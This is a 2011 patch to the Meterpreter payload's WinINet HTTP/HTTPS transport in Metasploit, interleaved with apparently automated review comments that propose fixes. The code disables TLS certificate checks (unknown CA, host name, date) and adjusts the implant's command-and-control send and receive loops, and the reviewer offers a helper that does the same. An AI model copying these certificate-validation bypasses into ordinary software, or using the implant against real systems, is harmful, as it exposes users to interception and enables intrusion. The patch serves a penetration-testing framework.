From 3bb2a2d07fa7bb925239573c554bb27a21d2d5b0 Mon Sep 17 00:00:00 2001
From: HD Moore
Date: Tue, 28 Jun 2011 07:30:48 +0000
Subject: [PATCH] Rework this for compatibility with older OSs

git-svn-id: file:///home/svn/framework3/trunk@13045 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../source/meterpreter/source/common/common.h | 2 +-
 .../source/meterpreter/source/common/core.c | 32 ++++++++++++++-----
 .../meterpreter/source/server/server_setup.c | 27 ++++++++--------
 3 files changed, 39 insertions(+), 22 deletions(-)

diff --git a/external/source/meterpreter/source/common/common.h b/external/source/meterpreter/source/common/common.h
index 507a7bf11e..2c6bd9098f 100644
--- a/external/source/meterpreter/source/common/common.h
+++ b/external/source/meterpreter/source/common/common.h
@@ -75,7 +75,7 @@ void real_dprintf(char *filename, int line, const char *function, char *format,
 #define METERPRETER_TRANSPORT_HTTPS 2
 // Enable debugging
-// #define DEBUGTRACE 1
+//#define DEBUGTRACE 1
 #ifdef DEBUGTRACE
 #define dprintf(...) real_dprintf(__VA_ARGS__)
diff --git a/external/source/meterpreter/source/common/core.c b/external/source/meterpreter/source/common/core.c
index 2bade9711c..28af2e0a3b 100644
--- a/external/source/meterpreter/source/common/core.c
+++ b/external/source/meterpreter/source/common/core.c
@@ -1109,8 +1109,11 @@ DWORD packet_transmit_via_http_wininet(Remote *remote, Packet *packet, PacketReq
 HINTERNET hRes;
 DWORD retries = 5;
 DWORD flags;
+ DWORD flen;
 unsigned char *buffer;
+ flen = sizeof(flags);
+
 buffer = malloc( packet->payloadLength + sizeof(TlvHeader) );
 if (! buffer) {
 SetLastError(ERROR_NOT_FOUND);
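Review bot: `flen` is declared and then given `sizeof(flags)` in a separate statement a few lines later; the idiomatic form is a single `DWORD flen = sizeof(flags);` at the declaration, which also removes the window in which the variable is uninitialised. More importantly, `flen` is the in/out length argument of the InternetQueryOption call this commit adds inside the do/while further down, and WinINet documents that parameter as being rewritten with the returned size, so if that loop ever runs more than once the second query would start from the previous call's output rather than from `sizeof(flags)`; resetting it immediately before each query (or using a local there) is safer. packet_transmit_via_http_wininet begins before this hunk and continues after it.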
@@ -1122,19 +1125,28 @@ DWORD packet_transmit_via_http_wininet(Remote *remote, Packet *packet, PacketReq
 do {
- flags = INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_NO_AUTO_REDIRECT | INTERNET_FLAG_NO_UI;
+ flags = INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_NO_AUTO_REDIRECT | INTERNET_FLAG_NO_UI;
 if (remote->transport == METERPRETER_TRANSPORT_HTTPS) {
 flags |= INTERNET_FLAG_SECURE | INTERNET_FLAG_IGNORE_CERT_CN_INVALID | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID;
 }
 hReq = HttpOpenRequest(remote->hConnection, "POST", remote->uri, NULL, NULL, NULL, flags, 0);
+
 if (hReq == NULL) {
 dprintf("[PACKET RECEIVE] Failed HttpOpenRequest: %d", GetLastError());
 SetLastError(ERROR_NOT_FOUND);
 break;
 }
+
+ if (remote->transport == METERPRETER_TRANSPORT_HTTPS) {
+ InternetQueryOption( hReq, INTERNET_OPTION_SECURITY_FLAGS, &flags, &flen);
+ flags |= SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_CN_INVALID | SECURITY_FLAG_IGNORE_UNKNOWN_CA;
+ InternetSetOption(hReq, INTERNET_OPTION_SECURITY_FLAGS, &flags, flen);
+ }
+
 retry_request:
 hRes = HttpSendRequest(hReq, NULL, 0, buffer, packet->payloadLength + sizeof(TlvHeader) );
+
 if (hRes == NULL && GetLastError() == ERROR_INTERNET_INVALID_CA && retries > 0) {
 retries--;
- flags = 0x3380;
- InternetSetOption(hReq, INTERNET_OPTION_SECURITY_FLAGS, &flags, 4);
+// flags = 0x3380;
+// InternetSetOption(hReq, INTERNET_OPTION_SECURITY_FLAGS, &flags, 4);
 goto retry_request;
 }
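Review bot: The new HTTPS security-flag override sets `SECURITY_FLAG_IGNORE_UNKNOWN_CA` twice and never sets `SECURITY_FLAG_IGNORE_CERT_DATE_INVALID`, so the per-request option does not match the `INTERNET_FLAG_IGNORE_CERT_DATE_INVALID` passed to HttpOpenRequest a few lines earlier, and an expired or not-yet-valid listener certificate may still be rejected on the older systems this commit targets. The InternetQueryOption return value is also unchecked: if it fails, `flags` still holds the INTERNET_FLAG_* request flags, and those unrelated bits are OR'ed with the SECURITY_FLAG_* values and written back through InternetSetOption. With the old `flags = 0x3380` fallback commented out, the ERROR_INTERNET_INVALID_CA branch now re-sends an identical request up to five times with nothing changed between attempts, so it should either be removed or documented as a deliberate no-op. Disabling CA, CN and date validation is presumably intentional for a stager talking to a listener with a self-signed certificate, but that deserves a one-line comment rather than being implied. The enclosing function begins before and ends after this hunk.
```c
    if (remote->transport == METERPRETER_TRANSPORT_HTTPS) {
        // Deliberate: the HTTPS listener is expected to present a self-signed
        // certificate, so disable CA / CN / date validation on this request.
        flen = sizeof(flags);
        if (InternetQueryOption(hReq, INTERNET_OPTION_SECURITY_FLAGS, &flags, &flen)) {
            flags |= SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_CN_INVALID | SECURITY_FLAG_IGNORE_CERT_DATE_INVALID;
            InternetSetOption(hReq, INTERNET_OPTION_SECURITY_FLAGS, &flags, sizeof(flags));
        } else {
            dprintf("[PACKET TRANSMIT] InternetQueryOption(SECURITY_FLAGS) failed: %d", GetLastError());
        }
    }
    // … unchanged: retry_request label and HttpSendRequest …
```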
@@ -1340,18 +1352,22 @@ DWORD packet_receive_http_via_wininet(Remote *remote, Packet **packet) {
 HINTERNET hRes;
 DWORD retries = 5;
+ dprintf("[PACKET RECEIVE] Acquiring lock");
+ lock_acquire( remote->lock );
 do {
- flags = INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_NO_AUTO_REDIRECT | INTERNET_FLAG_NO_UI;
+ flags = INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_NO_AUTO_REDIRECT | INTERNET_FLAG_NO_UI;
 if (remote->transport == METERPRETER_TRANSPORT_HTTPS) {
 flags |= INTERNET_FLAG_SECURE | INTERNET_FLAG_IGNORE_CERT_CN_INVALID | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID;
 }
-
- hReq = HttpOpenRequest(remote->hConnection, "GET", remote->uri, NULL, NULL, NULL, flags, 0);
+ dprintf("[PACKET RECEIVE] HttpOpenRequest");
+ hReq = HttpOpenRequest(remote->hConnection, "POST", remote->uri, NULL, NULL, NULL, flags, 0);
 if (hReq == NULL) {
 dprintf("[PACKET RECEIVE] Failed HttpOpenRequest: %d", GetLastError());
 SetLastError(ERROR_NOT_FOUND);
 break;
 }
+ retry_request:
+ dprintf("[PACKET RECEIVE] HttpSendRequest");
 hRes = HttpSendRequest(hReq, NULL, 0, "RECV", 4);
 dprintf("[RECEIVE] Got HTTP Reply: 0x%.8x", hRes);
 if (hRes == NULL && GetLastError() == ERROR_INTERNET_INVALID_CA && retries > 0) {
@@ -1372,7 +1388,7 @@ retry_request:
 while (inHeader && retries > 0) {
 retries--;
-
+ dprintf("[PACKET RECEIVE] Header");
 if (! InternetReadFile(hReq, ((PUCHAR)&header + headerBytes), sizeof(TlvHeader) - headerBytes, &bytesRead)) {
 dprintf("[PACKET RECEIVE] Failed HEADER InternetReadFile: %d", GetLastError());
 SetLastError(ERROR_NOT_FOUND);
@@ -1415,7 +1431,7 @@ retry_request:
 while (payloadBytesLeft > 0 && retries > 0 ) {
 retries--;
-
+ dprintf("[PACKET RECEIVE] Data");
 if (! InternetReadFile(hReq, payload + payloadLength - payloadBytesLeft, payloadBytesLeft, &bytesRead)) {
 dprintf("[PACKET RECEIVE] Failed BODY InternetReadFile: %d", GetLastError());
 SetLastError(ERROR_NOT_FOUND);
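Review bot: `lock_acquire( remote->lock )` is taken at the top of packet_receive_http_via_wininet, but no matching release is visible in this hunk, and the body already leaves the do/while early via `break` when HttpOpenRequest fails; every exit path must release `remote->lock` or the next receive (and anything else sharing that lock) deadlocks, which needs confirming against the rest of the function, which continues beyond this hunk. The HTTPS receive path also still relies only on the INTERNET_FLAG_IGNORE_CERT_* flags given to HttpOpenRequest and did not get the INTERNET_OPTION_SECURITY_FLAGS override this commit adds to the transmit path, so on the older systems the commit targets the "RECV" POST can still fail with ERROR_INTERNET_INVALID_CA and the new `retry_request:` label will only re-send the same request. Applying the same InternetQueryOption/InternetSetOption sequence right after the `if (hReq == NULL)` check, through one shared static helper used by both paths, keeps the two transports in step. The new lock line would also benefit from a comment stating what the lock serialises; it presumably guards concurrent WinINet use of `remote->hConnection`, but that should be confirmed rather than assumed.
```c
/* Disable CA / CN / date validation on one request handle. Intended for the
 * HTTPS transport, whose listener is expected to present a self-signed cert. */
static void http_ignore_cert_errors(HINTERNET hReq)
{
    DWORD secFlags = 0;
    DWORD secLen   = sizeof(secFlags);
    if (InternetQueryOption(hReq, INTERNET_OPTION_SECURITY_FLAGS, &secFlags, &secLen)) {
        secFlags |= SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_CN_INVALID | SECURITY_FLAG_IGNORE_CERT_DATE_INVALID;
        InternetSetOption(hReq, INTERNET_OPTION_SECURITY_FLAGS, &secFlags, sizeof(secFlags));
    }
}

    // … unchanged: HttpOpenRequest and the hReq == NULL check …
    if (remote->transport == METERPRETER_TRANSPORT_HTTPS) {
        http_ignore_cert_errors(hReq);
    }
    // … unchanged: retry_request label and HttpSendRequest …
```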
diff --git a/external/source/meterpreter/source/server/server_setup.c b/external/source/meterpreter/source/server/server_setup.c
index 3e16c95389..0df14b55aa 100644
--- a/external/source/meterpreter/source/server/server_setup.c
+++ b/external/source/meterpreter/source/server/server_setup.c
@@ -388,8 +389,9 @@ static DWORD server_dispatch_http_wininet( Remote * remote )
 URL_COMPONENTS bits;
 DWORD ecount = 0;
 DWORD delay = 0;
+ char tmpHostName[512];
+ char tmpUrlPath[1024];
-
 if (global_expiration_timeout > 0)
 remote->expiration_time = current_unix_timestamp() + global_expiration_timeout;
 else
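Review bot: The two new stack buffers are sized with bare literals (512 and 1024) that must stay in step with the `dwHostNameLength`/`dwUrlPathLength` fields assigned from them further down the function, and nothing records that a URL whose path component is longer than 1023 bytes will not fit. Name the bounds once, e.g. `enum { DISPATCH_HOST_MAX = 512, DISPATCH_PATH_MAX = 1024 };` above the function, and declare `char tmpHostName[DISPATCH_HOST_MAX];` and `char tmpUrlPath[DISPATCH_PATH_MAX];` so the length fields can refer to the same names. Because both buffers are later zero-filled before use, `= {0}` initialisers at the declaration would also make those separate memset calls unnecessary. server_dispatch_http_wininet continues past this hunk.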
@@ -407,27 +408,27 @@ static DWORD server_dispatch_http_wininet( Remote * remote )
 }
 dprintf("[DISPATCH] Configured hInternet: 0x%.8x", remote->hInternet);
+ // The InternetCrackUrl method was poorly designed...
+ memset(tmpHostName, 0, sizeof(tmpHostName));
+ memset(tmpUrlPath, 0, sizeof(tmpUrlPath));
+ memset(&bits, 0, sizeof(bits));
 bits.dwStructSize = sizeof(bits);
- bits.dwSchemeLength = 1;
- bits.dwHostNameLength = 1;
- bits.dwUserNameLength = 1;
- bits.dwPasswordLength = 1;
- bits.dwUrlPathLength = 1;
- bits.dwExtraInfoLength = 1;
+ bits.dwHostNameLength = sizeof(tmpHostName) -1;
+ bits.lpszHostName = tmpHostName;
+ bits.dwUrlPathLength = sizeof(tmpUrlPath) -1;
+ bits.lpszUrlPath = tmpUrlPath;
+
 InternetCrackUrl(remote->url, 0, 0, &bits);
- remote->uri = _strdup(bits.lpszUrlPath);
-
- bits.lpszHostName[bits.dwHostNameLength] = 0;
-
+ remote->uri = _strdup(tmpUrlPath);
 dprintf("[DISPATCH] Configured URL: %s", remote->uri);
- dprintf("[DISPATCH] Host: %s Port: %u", bits.lpszHostName, bits.nPort);
+ dprintf("[DISPATCH] Host: %s Port: %u", tmpHostName, bits.nPort);
 // Allocate the connection handle
- remote->hConnection = InternetConnect(remote->hInternet, bits.lpszHostName, bits.nPort, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
+ remote->hConnection = InternetConnect(remote->hInternet, tmpHostName, bits.nPort, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
 if (!remote->hConnection) {
 dprintf("[DISPATCH] Failed InternetConnect: %d", GetLastError());
 return 0;